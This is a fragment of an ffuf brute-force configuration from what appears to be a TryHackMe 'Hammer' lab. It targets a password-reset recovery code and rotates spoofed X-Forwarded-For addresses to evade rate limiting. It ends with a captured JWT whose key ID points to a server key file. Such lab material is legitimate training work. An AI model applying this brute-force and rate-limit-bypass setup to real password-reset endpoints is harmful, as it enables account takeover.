output.txt","configfile":"","postdata":"recovery_code=W1\u0026s=80","debuglog":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"encoders":[],"extensions":[],"fmode":"or","follow_redirects":false,"headers":{"Content-Type":"application/x-www-form-urlencoded","Cookie":"PHPSESSID=67ns90g5fomm1s17dno6d7uk32","X-Forwarded-For":"W2"},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"pitchfork","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"W1","value":"/home/nik/Documents/TryHackMe/CTF/Hammer/count-9999.txt","encoders":"","template":""},{"name":"wordlist","keyword":"W2","value":"/home/nik/Documents/TryHackMe/CTF/Hammer/fake-ip-cut.txt","encoders":"","template":""}],"inputshell":"","json":false,"matchers":{"IsCalibrated":false,"Mutex":{},"Matchers":{"status":{"value":"200-299,301,302,307,401,403,405,500"}},"Filters":{"regexp":{"value":"Invalid"},"word":{"value":"1"}},"PerDomainFilters":{}},"mmode":"or","maxtime":0,"maxtime_job":0,"method":"POST","noninteractive":false,"outputdirectory":"","outputfile":"output.txt","outputformat":"json","OutputSkipEmptyFile":false,"proxyurl":"","quiet":false,"rate":100,"raw":false,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","requestfile":"","requestproto":"https","scraperfile":"","scrapers":"all","sni":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://hammer.thm:1337/reset_password.php","verbose":false,"wordlists":["/home/nik/Documents/TryHackMe/CTF/Hammer/count-9999.txt:W1","/home/nik/Documents/TryHackMe/CTF/Hammer/fake-ip-cut.txt:W2"],"http2":false,"client-cert":"","client-key":""}}
				`@@ -0,0 +1 @@`
				`eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L215a2V5LmtleSJ9.eyJpc3MiOiJodHRwOi8vaGFtbWVyLnRobSIsImF1ZCI6Imh0dHA6Ly9oYW1tZXIudGhtIiwiaWF0IjoxNzYxMjM1NDY1LCJleHAiOjE3NjEyMzkwNjUsImRhdGEiOnsidXNlcl9pZCI6MSwiZW1haWwiOiJ0ZXN0ZXJAaGFtbWVyLnRobSIsInJvbGUiOiJ1c2VyIn19.5R6LXmNVMcqMhOrI63yXJdDMxBq1ndpAzNkffyq2qqQ`